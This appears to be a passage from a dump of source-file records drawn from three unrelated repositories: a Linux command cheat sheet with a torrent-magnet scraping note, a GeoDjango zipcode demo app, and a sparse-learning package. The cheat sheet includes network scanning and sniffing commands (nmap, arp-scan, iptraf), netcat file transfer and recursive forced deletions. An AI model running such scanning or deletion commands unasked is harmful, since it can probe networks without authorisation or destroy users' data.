:bounce:</what></comment>\n<comment><when>2004-09-03 12:15</when><what>tittade på den här på en 32 tummare, och det var inga problem, syrrans ungar blev väldigt till sig när jag kom m$\n<comment><when>2006-07-08 10:58</when><what>När kommer den sista 0.1% ? Är det någon som har denna torrent komplett så var snäll och seeda. 
Lite tråkigt med$\n</comments>\n\n</torrent>\n```\n\n\n\nI think Python + BS4 is a good fit for this since we can scrape the required data and place into a MySQL database (See Icemelt)\n\nINITIAL DATA DUMP FROM WEB SITE\n\nIF title is ```<title>Not Found``` there is no data beyond this point on the page\n\n```\n<div id=\"title\">\nThe whole Pirate Bay magnet archive</div>\n<div id='details'>\n<dl class='col1'>\n<dt>Type:</dt>\n<dd><a href=\"/browse/699\" title=\"More from this category\">Other &gt; Other</a></dd>\n<dt>Files:</dt>\n<dd><a href=\"javascript:void(0);\" title=\"Files\" onclick=\"if( filelist &lt; 1 ) { new Ajax.Updater('filelistContainer', '/ajax_details_filelist.php', { method: 'get', parameters: 'id=7016365' } ); filelist=1; }; toggleFilelist(); return false;\">1</a></dd>\n<dt>Size:</dt>\n<dd>90.1&nbsp;MiB&nbsp;(94475182&nbsp;Bytes)</dd>\n<dt>Tag(s):</dt>\n<dd><a href=\"/tag/pirate+bay\">pirate bay</a> <a href=\"/tag/dump\">dump</a> </dd>\n</dl>\n<dl class='col2'>\n<dt>Uploaded:</dt>\n<dd>2012-02-08 03:48:18 GMT</dd>\n<dt>By:</dt>\n<dd><a href=\"/user/allisfine/\" title=\"Browse allisfine\">allisfine</a></dd>\n<dt>Seeders:</dt>\n<dd>20</dd>\n<dt>Leechers:</dt>\n<dd>1</dd>\n<dt>Comments</dt>\n<dd><span id='NumComments'>105</span>\n&nbsp; </dd>\n<br/>\n<dt>Info Hash:</dt><dd></dd>\n938802790A385C49307F34CCA4C30F80B03DF59C\n </dl>\n```\n\nanother torrent file had this format:\n\n3519077|Star Trek DS9 S7D1|4642166784|1|0|8aff8ea107b84f77fb0b47ce311739339af125a4\n\nsomething|Title|\n\nThis will print out a table with magnet links and torrent names\n\n```bash\ncat complete | grep \"[Ss]earch [Tt]erm\" | awk -F \"|\" '{print $2,\"<>magnet:?xt=urn:btih:\"$6}' | awk -F \"<>\" -f \"col.awk\"\n```\n\ncol.awk\n```awk\n{\n width=65;\n separator=\"\";\n\n for (i=1; i<=NF; i++) {\n if (match($i, /[-+]*[0-9]+[\\.]*[0-9]*/)) {\n printf(\"%\"width\"s\", $i);\n }\n else {\n printf(\"%-\"width\"s\", $i);\n }\n if (i == NF) printf(\"\\n\");\n else printf(\"%s\", separator);\n }\n}\n```\n" }, { "alpha_fraction": 0.5089569687843323, "alphanum_fraction": 0.5156537890434265, "avg_line_length": 78.61333465576172, "blob_id": "f8505a41468391cdea26aef33ca34ae07a36adbd", "content_id": "c5937455f3318b83a0408ac5390a60280e660385", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 5973, "license_type": "no_license", "max_line_length": 268, "num_lines": 75, "path": "/commands.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "\n```bash\nfind -type f -print0 | xargs -0 md5sum > www.md5 #use find to search and then Xargs to split that to a single line command for md5sum to do a recursive md5sum of search path can also use -name '*.XXX' to search for any file with extention XXX\nfind . -name '*.oma' -print0 | xargs -0 -I % cp % /mnt/MUSIC/OMA #copys all OMA file in the DIR tree to /mnt/MUSIC/OMA\nfind . -name '*.XXX' -print0 | xargs -0 rm -fV #find and remove all files with XXX in dir TREE\nfind . 
-name 'FILE'\t\t #FIND FILE\nnetstat -an | grep PORT #do a portmap look up and display all entries with PORT\nnmap IPADDRESS -p PORT #probes the PORT on IPADDRESS can also use a HOSTNAME with out the -p maps all ports that are OPEN\ncat OS.sh | wall #print the file OS.sh into Wall to displayied on ALL ttys\nsudo apt-get dist-upgrade #install all upgrades\nsudo fdisk -l #list all file systems connected to the computer\nsudo ufw status #FIREWALL status\nuuidgen >> uuid.dat #make a random uuid and print to uuid.dat APPEND\nuptime #displays the uptime for the server\nhostname --fqdn #display the full qualified domain name\nmd5sum -c FILE.md5 #check files against FILE.md5\nmd5sum -b *.* > FILE.md5 #make an md5sum for files and store in FILE.md5\nsudo /etc/init.d/networking restart #restart the Network interface deamon\nnslookup WWW #look up IP with WWW host\nsudo sed -i 's/OLD-WORD/NEW-WORD/g' FILE-NAME #replace OLD-WORD with NEW-WORD in file with name FILE as ROOT\n (sed can also use 's:OLD-PATTERN:NEW-PATTERN:g')\nsudo mount SERVER-ADDY:/LocalRepos LOCAL-MOUNT-DIR #mount remote SERVER-ADDY:/LocalRepos into the local LOCAL-MOUNT-DIR\nchown NEWUSER FILE #change owner of FILE to NEWUSER. MUST BE ROOT!!!!\nsudo dhclient ADAPTER\t\t\t\t\t\t\t #release and renew the lease for ADAPTER\nsudo iptraf #IPtrafic monitor paket sniffer\nps -aux #display Process the 2nd colume is the PID\nkill -9 PID #PID is the Process ID can be found using ps -aux see above\nsudo crontab -l #list all Crontab Jobs that are running\n\nsudo cat /home/admiral/blacklist.domains >> /etc/squid/bad_domains #update bad_domains with blacklist.domain\nsudo reload squid #reloads all the config files to squid\nsudo restart squid #restarts the squid proxy server\n\n\n\ntar xvzf file.tgz\t\t\t\t\t\t #will unzip FILE.tgz\ntar -zxvf file.tar.gz\t\t\t\t\t\t\t # will extract everything from file.tar.gz\ntar -zcvf tarfile.tar.gz -C /path/to/foldername_tocompress # Compress Entire directory with Subdirectories\ndpkg --get-selections | grep php\t\t\t\t\t#this will grab the installed list and then filter it for a single package\ndpkg -L php5-gd\t\t\t\t\t\t\t\t\t\t#this will locate all the files for a specific package\n\ngrep -c processor /proc/cpuinfo\t\t\t\t# count number of processors on your system\ncat /proc/cpuinfo\t\t\t\t\t\t\t#print out a list of information about your processor\ngrep NR_CPUS /boot/config-`uname -r`\t\t#grab the MAX number of processors suported by KERNEL\ndmesg |grep processor\t\t\t\t\t\t#find the Number of processors in a system\nlscpu\t\t\t\t\t\t\t\t\t\t#indepth processor info including 64 bit compatability\n\niperf -s -p 65000\t\t\t\t\t\t #on machine1 (host, this one will receive)\niperf -c [ip of server] -p 65000\t\t\t\t #on machine2 (client, this one will upload)\n\n\n----------------------------------------------------------------- FIREWALL RULES ---------------------------------------------------------\n\niptables -A INPUT -m mac --mac-source MAC:ADDRSS:HERE -j ACCEPT #MAC adress filter ACCEPT from mac-source when defualt policy is DROP\niptables -A INPUT -m mac ! 
--mac-source MAC:ADDRSS:HERE -j DROP #MAC adress filter DROP from ALL BUT mac-source\n\n_________________________________________________________ server / client file transfers _________________________\n\nnc EXAMPLE.COM PORT | pv | tar -xf -\t\t\t#Client side to download with a speed bar on it\ntar -cf - PATH/TO/FILE | pv -s $(du -sb PATH/TO/FILE | awk '{print $1}') | nc -l PORT #server side with ETA\n\n\nsudo arp-scan --interface=eth1 --localnet #scan all addresses localnet using eth1 grabs fingerprint for mac IDs\n\n\n______________________________________ Hard drive Clone and Virtualization ___________________________________________\n\ndd if=/dev/sdb of=dd-image.raw #Clones the /dev/sdb drive\nVBoxManage convertdd dd-image.raw sda.vdi --format VDI --variant Fixed #Convert clone to Virtual drive\n\n______________________________________ A/V Converstion ___________________________________________\n\nfor f in *.mkv; do avconv -i \"$f\" -codec copy \"${f%.mkv}.mp4\"; done\n\ncurl http://URL_HERE | grep \"[Mm][Pp]3\" | sed 's:FILTER_TO_STRIP::g' | sed 's:PATTERN_TO_STRIP::g' | sed 's|.*:|http:|g' > MP3Links.txt\n```\n\n" }, { "alpha_fraction": 0.8066157698631287, "alphanum_fraction": 0.8066157698631287, "avg_line_length": 77.5999984741211, "blob_id": "c5b6235a4d71e35798e93b60152b14c561a6cc2c", "content_id": "1e14038a9216c2053a7f7c305dd2a43afd4347e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 393, "license_type": "no_license", "max_line_length": 237, "num_lines": 5, "path": "/README.md", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "# Linux-Cheats\nLinux Cheat Sheets\n\nSimple little repository for keeping commonly used command line snippets. Please feel free to add your own to the list.\nThese snippets of code are practicly useless if you copy and paste directly to a shell, most of these commands have things you may need to replace to effectivly use each snippet there is an explination for each one giving a brief how-to.\n" }, { "alpha_fraction": 0.6227598786354065, "alphanum_fraction": 0.6424731016159058, "avg_line_length": 29.16216278076172, "blob_id": "350601741d8b35520810764cddae8572de84a3ca", "content_id": "6c3f9b0470374d5737f76e769eb3ddf453f12f39", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1116, "license_type": "no_license", "max_line_length": 91, "num_lines": 37, "path": "/filesort.sh", "repo_name": "Morketh/Linux-Cheats", "src_encoding": "UTF-8", "text": "#!/bin/bash\npath=$1 # Starting path to the directory of the junk files\nvar=0 # How many records were processed\nSECONDS=0 # reset the clock so we can time the event\n\nclear\n\nif [[ -z $1 ]]; then\n echo \"Argument list is empty: $1 and $2\"\nfi\n\necho \"Searching $1 for file types and then moving all files into grouped folders.\"\n\n# add extentions here for fast matching\nfor ext in jpg mp3 txt locky mp4; do\n mkdir -p \"$ext\"\n # For simplicity, I'll assume your mv command supports the -t option\n find \"$1\" -name \"*.$ext\" -exec mv -t \"$ext\" {} +\ndone\n\n# now that we've moved all the easy ones lets look at each file one-on-one\nfor f in \"$1\"/*; do\n ((var++))\n ext=${f##*.}\n # Probably more efficient to check in-shell if the directory\n # already exists than to start a new process to make the check\n # for you.\n [[ -d $ext ]] || mkdir \"$ext\"\n mv \"$f\" \"$ext\"\ndone\n\ndiff=$SECONDS\necho \"$var Files found and orginized in:\"\necho \"$(($diff / 3600)) 
hours, $((($diff / 60) % 60)) minutes and $(($diff % 60)) seconds.\"\n\necho \"cleaning up empty directories.....\"\nfind . -type d -size 0c -delete\n" } ]
9
leonelphm/geodjango-demo
https://github.com/leonelphm/geodjango-demo
dbd1224a9fbeb6f34938296dd0e002ddcc08a612
9e7782e95b35f93af56ddc52bcb7e76f13b64b86
6f6bcfdae52518329b684223a6ada8e04884b96d
refs/heads/master
2021-07-08T17:32:27.885344
2017-10-06T19:07:19
2017-10-06T19:07:19
105,780,283
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.704049825668335, "alphanum_fraction": 0.7274143099784851, "avg_line_length": 31.100000381469727, "blob_id": "568251af41ba9a8ba62e1539207ad0c2d4084c35", "content_id": "9788d45c8460f8eba90a0e1ad40c594fd2df6210", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 648, "license_type": "no_license", "max_line_length": 114, "num_lines": 20, "path": "/geolocation/admin.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.admin\n#\n# Admin correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.contrib.gis import admin\n\nfrom .models import *\n\n\nadmin.site.register(Zipcode, admin.OSMGeoAdmin)\n" }, { "alpha_fraction": 0.7391156554222107, "alphanum_fraction": 0.7465986609458923, "avg_line_length": 25.981651306152344, "blob_id": "55b47f85cb632407ab640789d40bc2887f20066c", "content_id": "57e99166fe3e8f02a96751a7271ab07d7d2c44cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 2948, "license_type": "no_license", "max_line_length": 284, "num_lines": 109, "path": "/README.rst", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "Esta aplicación se trata de un demo para implementar django.contrib.gis.\n\nA continuación se presenta los pasos para instalar la aplicación en modo desarrollo\n\n1-) Instalar el controlador de versiones git:\n \n $ su\n\n # aptitude install git\n\n2-) Descargar el codigo fuente de geodjango-demo:\n\n Para descargar el código fuente del proyecto contenido en su repositorio GIT realice un clon del proyecto geodjango-demo:\n\n Si da problemas con el certificado digital entonces debemos saltar su chequeo con el siguiente comando\n\n $ export GIT_SSL_NO_VERIFY=True\n\n Realizar clone\n\n $ git clone https://github.com/leonelphm/geodjango-demo.git\n\n3-) Crear un Ambiente Virtual:\n\n El proyecto está desarrollado con el lenguaje de programación Python, se debe instalar Python v3.4.2. 
Con los siguientes comandos puede instalar Python y PIP.\n\n Entrar como root para la instalacion \n\n # aptitude install python3.4 python3-pip python3.4-dev python3-setuptools\n\n # aptitude install python3-virtualenv virtualenvwrapper\n\n Salir del modo root y crear el ambiente:\n\n $ mkvirtualenv --python=/usr/bin/python3 geodjango\n\n\n4-) Instalar los requerimientos del proyecto \n\n Para activar el ambiente virtual geodjango ejecute el siguiente comando:\n\n $ workon geodjango\n\n Quedando activado el entorno virtual de esta manera.\n\n (geodjango)$\n\n Entrar en la carpeta raiz del proyecto:\n\n (geodjango)$ cd geodjango-demo\n\n (geodjango)geodjango-demo$ \n\n Desde ahi se deben instalar los requirimientos del proyecto con el siguiente comando:\n\n (geodjango)$ pip install -r requerimientos.txt\n\n\n5-) Crear base de datos y Migrar los modelos:\n\n El manejador de base de datos que usa el proyecto es postgres, es necesario, tener instalado postgres y crear la base de datos desde postgres de la siguiente manera si se usa la consola de postgres, ademas se debe instalar postgis para el uso de una base de datos georeferenciada:\n\n Como super usuario instalar postgis:\n\n # aptitude install postgis\n\n # aptitude install postgresql-x.x-postgis-x.x\n\n Ingresar a la consola de postgres con la siguiente orden:\n\n $ psql \n\n Ejecutar la siguiente sentencia estando en la consola de postgres:\n\n postgres=# CREATE DATABASE geodjango OWNER=postgres ENCODING='UTF−8';\n\n postgres=# \\q\n\n $ psql geodjango\n\n geodjango=# CREATE EXTENSION postgis;\n\n Para migrar los modelos del proyecto se debe usar el siguiente comando:\n\n (geodjango)$ python manage.py makemigrations\n\n (geodjango)$ python manage.py makemigrations geolocation\n\n (geodjango)$ python manage.py migrate\n\n\n7-) Ejecutar la aplicacion geodjango-demo\n\n Para ejecutar la apliacion se debe ejecutar el siguiente comando:\n\n (geodjango)$ python manage.py runserver\n\n Ingresar a la ruta para registrar un zipcode en geodjango-demo.\n\n http://localhost:8000/geolocation/register-poly/\n\n\nContacto:\n\nleonelphm@gmail.com\n\nleonelphm@hotmail.com\n\nlhernandez@cenditel.gob.ve" }, { "alpha_fraction": 0.5489690899848938, "alphanum_fraction": 0.561855673789978, "avg_line_length": 35.375, "blob_id": "106a82cc003c931359477d7a905d0843533e5ab3", "content_id": "de782dce2ec21bcdf51a538004a295ca2753c217", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1170, "license_type": "no_license", "max_line_length": 114, "num_lines": 32, "path": "/geolocation/urls.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.urls\n#\n# Urls correspondientes a la geolocation\n# @author Ing. 
Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.conf.urls import url\n\nfrom .views import *\n\nurlpatterns = [\n url(r'^register-poly/',\n RegisterPolyView.as_view(),\n name=\"register_poly\"),\n url(r'^list-zipcode/',\n ListZipcodeView.as_view(),\n name=\"list_zipcode\"),\n url(r'^delete-zipcode/(?P<pk>\\d+)/',\n ZipcodeDeleteView.as_view(),\n name=\"delete_zipcode\"),\n url(r'update-zipcode/(?P<pk>\\d+)/$',\n ZipCodeUpdate.as_view(),\n name='update_zipcode')\n ]\n" }, { "alpha_fraction": 0.6700223684310913, "alphanum_fraction": 0.6927666068077087, "avg_line_length": 31.707317352294922, "blob_id": "b18d32531a80cd1153daf288d39680a676428cde", "content_id": "970ba1af0b6400be844a556f4c0f9f6dfcdee9b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2691, "license_type": "no_license", "max_line_length": 114, "num_lines": 82, "path": "/geolocation/views.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.views\n#\n# Views correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\n\nfrom django.contrib import messages\nfrom django.contrib.messages.views import SuccessMessageMixin\nfrom django.urls import reverse_lazy\nfrom django.views.generic.edit import (\n FormView, DeleteView, UpdateView\n )\nfrom django.views.generic import ListView\n\nfrom .forms import *\nfrom .models import *\n\n\nclass RegisterPolyView(FormView):\n \"\"\"!\n Clase que controla el formulario del zipcode para el template\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n form_class = ZipcodeForms\n template_name = 'geodjango-template.html'\n success_url = '/geolocation/register-poly/'\n\n def form_valid(self, form, **kwargs):\n \"\"\"\n Funcion que valida el formulario de registro de la explicacion situacional\n @return: Dirige con un mensaje de exito a el geolocation\n \"\"\"\n new_zipcode = form.save()\n messages.success(self.request, \"ZipCode %s, registrado con exito\" % (str(new_zipcode)))\n return super(RegisterPolyView, self).form_valid(form)\n\n\nclass ListZipcodeView(ListView):\n \"\"\"\n Clase que controla el listado del zipcode\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n template_name = 'geodjango-list.html'\n paginate_by = 3\n\n\nclass ZipcodeDeleteView(DeleteView):\n \"\"\"\n Clase que controla el eliminado del zipcode\n\n @author Ing. Leonel P. Hernandez M. 
(lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n success_url = reverse_lazy('geolocation:list_zipcode')\n\n\nclass ZipCodeUpdate(UpdateView, SuccessMessageMixin):\n model = Zipcode\n form_class = ZipcodeForms\n success_message = 'ZipCode Actualizado con exito'\n success_url = reverse_lazy('geolocation:list_zipcode')\n" }, { "alpha_fraction": 0.5722960233688354, "alphanum_fraction": 0.6011385321617126, "avg_line_length": 37.75, "blob_id": "63956bad1c6e07001f6b408bb603672992cc0320", "content_id": "116f70ee9132b3775ae99b72b1f9b112f0cb6c59", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2644, "license_type": "no_license", "max_line_length": 114, "num_lines": 68, "path": "/geolocation/forms.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geodjango.forms\n#\n# Formularios correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\n\nfrom django.contrib.gis import forms\n\nfrom .models import *\n\n\nclass ZipcodeForms(forms.ModelForm):\n \"\"\"!\n Clase que permite crear el formulario para el Zipcode\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del formulario\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n model = Zipcode\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n \"\"\"!\n Funcion que construye el init del formulario\n\n @author Ing. Leonel P. Hernandez M. 
(lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n \"\"\"\n super(ZipcodeForms, self).__init__(*args, **kwargs)\n self.fields['code'].widget.attrs.update({'class': 'form-control',\n 'placeholder': 'Zip Code'})\n self.fields['code'].label = 'Zip Code'\n self.fields['code'].required = True\n\n # Se le agrega la ruta donde se construye el mapa con el default_zoom\n self.fields['poly'].widget = forms.OSMWidget.template_name = 'openlayers-cust.html'\n\n # Se le agrega al campo los atributos que por defecto tiene la ubicacion (lat lon) de Venezuela\n # Con un zoom por defecto de 5.2 y\n # Un alto y ancho de 600X400\n self.fields['poly'].widget = forms.OSMWidget(attrs={\n 'default_zoom': 5.2, 'map_width': 600,\n 'map_height': 400, 'default_lat': 8,\n 'default_lon': -66})\n self.fields['poly'].label = 'Cordenadas Poligonales'\n self.fields['poly'].required = True\n" }, { "alpha_fraction": 0.5795981287956238, "alphanum_fraction": 0.6114373803138733, "avg_line_length": 34.5494499206543, "blob_id": "ea34206984976ce9b5ff419a8ee7090c6a9bbe53", "content_id": "53e6ee77575c3d865e13e177401ee7b7d76b68e9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3247, "license_type": "no_license", "max_line_length": 114, "num_lines": 91, "path": "/geolocation/models.py", "repo_name": "leonelphm/geodjango-demo", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\ngeodjango-demo\n\nCopyleft (@) 2017 CENDITEL nodo Mérida - Copyleft (@) 2017 CENDITEL nodo Mérida\n\"\"\"\n## @package geolocation.models\n#\n# Modelos correspondientes a la geolocation\n# @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n# @author <a href='http://www.cenditel.gob.ve'>Centro Nacional de Desarrollo e Investigación en Tecnologías Libres\n# (CENDITEL) nodo Mérida - Venezuela</a>\n# @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n# @version 1.0\nfrom django.contrib.gis.db import models\n\n\nclass Zipcode(models.Model):\n \"\"\"!\n Clase que gestiona los datos del Zipcode\n\n @author Ing. Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n # Campo del ZioCode\n code = models.CharField(max_length=5)\n # Campo de la poligonal\n poly = models.PolygonField()\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del modelo\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n ordering = ('code',)\n verbose_name = 'Zipcode'\n verbose_name_plural = 'Zipcodes'\n\n def __str__(self):\n \"\"\"!\n Funcion que muestra la informacion de los Zipcodes\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @param self <b>{object}</b> Objeto que instancia la clase\n @return Devuelve los datos de la asignacion del Zipcode\n \"\"\"\n return self.code\n\n\nclass Elevation(models.Model):\n \"\"\"!\n Clase que gestiona los datos de la Elevation\n\n @author Ing. 
Leonel Paolo Hernandez Macchiarulo (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n name = models.CharField(max_length=100)\n rast = models.RasterField()\n\n class Meta:\n \"\"\"!\n Clase que construye los meta datos del modelo\n\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @version 1.0.0\n \"\"\"\n ordering = ('name',)\n verbose_name = 'Elevation'\n verbose_name_plural = 'Elevations'\n\n def __str__(self):\n \"\"\"!\n Funcion que muestra la informacion de las Elevations\n @author Ing. Leonel P. Hernandez M. (lhernandez at cenditel.gob.ve)\n @copyright <a href='http://www.gnu.org/licenses/gpl-2.0.html'>GNU Public License versión 2 (GPLv2)</a>\n @date 04-10-2017\n @param self <b>{object}</b> Objeto que instancia la clase\n @return Devuelve los datos de la asignacion del Elevation\n \"\"\"\n return self.name\n" } ]
6
baojianzhou/sparse-learn
https://github.com/baojianzhou/sparse-learn
9b7f08738c2d40cda3991507fe0ee3d9c2c86bc1
ed01f2c3d518c0c48652bc4fe4dc552ba3d5a427
19e40804b118779d0d773b0577791cb4e874c7c4
refs/heads/master
2020-05-19T16:25:38.023222
2019-12-20T23:16:24
2019-12-20T23:16:24
185,107,625
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8333333134651184, "alphanum_fraction": 0.8333333134651184, "avg_line_length": 45, "blob_id": "f236c7211f88f092f3fab943f4507efe9288e419", "content_id": "0fcd0930522a33daaa35b14bf60d863a036255d3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 276, "license_type": "permissive", "max_line_length": 55, "num_lines": 6, "path": "/sparse_learn/examples/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"examples\"\nfrom sparse_learn.examples import example_model\nfrom sparse_learn.examples import example_test_all\nfrom sparse_learn.examples import example_test_proj\nfrom sparse_learn.examples import example_graph_da\nfrom sparse_learn.examples import example_graph_sto_iht\n" }, { "alpha_fraction": 0.8191881775856018, "alphanum_fraction": 0.8191881775856018, "avg_line_length": 32.875, "blob_id": "942f42e44a233a1c6d964e913cb8f2f468e9d451", "content_id": "510c21f6aa5f04d92a533ba9c409c932d0801bb5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 43, "num_lines": 8, "path": "/sparse_learn/__init__.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "name = \"sparse_learn\"\nfrom sparse_learn import c\nfrom sparse_learn import base\nfrom sparse_learn import examples\nfrom sparse_learn import graph_utils\nfrom sparse_learn import data_process\nfrom sparse_learn import algo_graph_da\nfrom sparse_learn import algo_graph_sto_iht\n" }, { "alpha_fraction": 0.5634704828262329, "alphanum_fraction": 0.6034896969795227, "avg_line_length": 40.37748336791992, "blob_id": "ebb6689fb4d03bab84394d37d34803355a08bbc3", "content_id": "bb9b53935dfc69260b0c5f7fae3dc0768a69bc8c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6247, "license_type": "permissive", "max_line_length": 112, "num_lines": 151, "path": "/sparse_learn/examples/example_model.py", "repo_name": "baojianzhou/sparse-learn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport time\nimport numpy as np\nfrom sparse_learn.proj_algo import head_proj\nfrom sparse_learn.proj_algo import tail_proj\nfrom sparse_learn.fast_pcst import fast_pcst\nfrom sparse_learn.graph_utils import simu_graph\nfrom sparse_learn.graph_utils import minimal_spanning_tree\nfrom sparse_learn.proj_algo import HeadTailWrapper\n\n\ndef test_proj_algo():\n print('-' * 100)\n edges, weights = simu_graph(25) # get grid graph\n sub_graph = [6, 7, 8, 9]\n x = np.random.normal(0.0, 0.1, 25)\n x[sub_graph] = 5.\n n, m = len(weights), edges.shape[1]\n re = head_proj(edges=edges, weights=weights, x=x, g=1, s=4, budget=3.,\n delta=1. / 169., err_tol=1e-6, max_iter=30, root=-1,\n pruning='strong', epsilon=1e-6, verbose=0)\n re_nodes, re_edges, p_x = re\n print('test1 result head nodes: ', re_nodes)\n print('test1 result head edges: ', re_edges)\n re = head_proj(edges=edges, weights=weights, x=np.zeros(n), g=1, s=4,\n budget=3., delta=1. 
